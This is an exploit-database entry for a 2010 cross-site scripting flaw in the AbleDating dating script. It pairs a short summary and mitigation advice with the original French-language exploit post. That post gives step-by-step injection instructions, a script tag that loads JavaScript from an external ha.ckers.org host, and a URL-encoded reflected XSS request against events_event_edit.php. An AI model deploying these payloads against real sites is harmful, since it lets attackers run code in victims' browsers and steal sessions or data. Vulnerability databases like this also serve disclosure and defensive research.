header-logo
Suggest Exploit
vendor:
AbleDating script
by:
Dr-mosta
7,5
CVSS
HIGH
Cross-Site Scripting (XSS)
79
CWE
Product Name: AbleDating script
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

AbleDating script 2010 Critical XSS Vulnerability

AbleDating script is vulnerable to Cross-Site Scripting (XSS) attacks. An attacker can inject malicious JavaScript code into the vulnerable parameters of the application. The malicious code can be injected into the 'title' or 'description' of a post in the forum, or into the 'date' parameter of the 'events_event_edit.php' page. The malicious code will be executed in the browser of the victim when they visit the affected page.

Mitigation:

Input validation should be used to prevent malicious code from being injected into the application. The application should also be configured to use a Content Security Policy (CSP) to prevent malicious code from being executed.
Source

Exploit-DB raw data:

# Exploit Title: AbleDating script 2010 Critical XSS Vulnerability 
# Date: 15.11.2010 
# Author: Dr-mosta 
# Category: webapps/0day 
# Script url: http://www.abk-soft.com/matchmaking_software_demo.html 
# Version: N/A 
# Tested on: 
# CVE :   

      [ EXPL0!T ] 

IL vaut faut inscrire au site apres aller a la partie forum ou par le 
lien  : www.sitevictim.com/forum.php
aper essais de choisir un category et essais de cree un Sujet dans le forum
vous pouvez ajouté votre code xss das le titre de Poster  ou Description ou Message

Exemple exploit code :

“><SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT><”

Exploit 2:

IL vaut faut inscrire au site apres l'Exploit :
(vuln): server/events_event_edit.php?events_event_edit.php?event_private=1&date=[XSS]
 
Exemple exploit code :

server/events_event_edit.php?event_private=1&date=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E%20%3Cinput%20style=%22visibility:%20visible;%22%20class=%22inp_lblack%20no_abk%20hasDatepicker%22%20id=%22event_date%22%20autocomplete=%22off%22%20name=%22event_date%22%20value=%2212-15-2010

      Greetz = TeaM MostA , exploit-db.com 

Good Luck .

Navigation

Suggest Exploit

Services By CQR